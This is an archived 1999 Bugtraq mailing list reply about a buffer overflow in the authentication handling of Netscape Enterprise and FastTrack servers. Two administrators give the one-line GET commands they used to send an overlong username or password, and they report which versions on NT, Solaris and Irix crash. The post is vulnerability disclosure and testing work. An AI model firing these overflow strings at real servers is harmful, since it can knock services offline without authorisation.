Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise and FastTrack Authentication Procedure
From: bsides () TOWERY COM (Brock Sides)
Date: Fri, 3 Dec 1999 15:38:04 -0600


Some more data. Using LWP's "GET" as follows:

$ GET -C `perl -e 'print "A"x1025'`:password http://hostname:port

Netscape FastTrack 3.0.1 on NT: crashes
Admin Server 3.5 on NT: crashes
Netscape FastTrack 3.0.2 on Irix 6.x: no problem
Admin Sever 3.5 on Irix 6.x: no problem
Netscape Enterprise 3.6sp2 on Irix 6.x: no problem

--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides () towery com

On Thu, 2 Dec 1999, Doug Monroe wrote:

RE:
ISS Security Advisory
December 1, 1999
Buffer Overflow in Netscape Enterprise and FastTrack Authentication
               > Procedure

I made a few simple pokes with variants of perl LWP's 'GET' function at
areas of 2 NES 3.x servers that are protected with Basic Authentication.
For example-
$ GET -C username:`perl -e 'print "A"x1025'` http://server/private-path
$ GET -C `perl -e 'print "A"x1025'`:password http://server/private-path

Solaris 2.6/NES 3.5.1 (and 3.6.3)-
 username:LONGpw -> http://server/private-path - NO KILL
 LONGusername:pw -> http://server/private-path - NO KILL

NT4/SP4/NES 3.6.2-
 username:LONGpw -> http://server/private-path - NO KILL
 LONGusername:pw -> http://server/private-path - KILL

Potentially important diffs/notes:
On the Solaris box, the private area was config'd with .nsconfig/NCSA-style
ACL.
On the NT, the private area was protected using local-db ACL, not NCSA-style.
I have not tried poking a local-db/LDIF protected area on Solaris.
I have not tried poking a .nsconfig/NCSA-style area on NT.
I have not tried poking at the admin server of either box.
--
Doug Monroe
www.interhack.net




  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault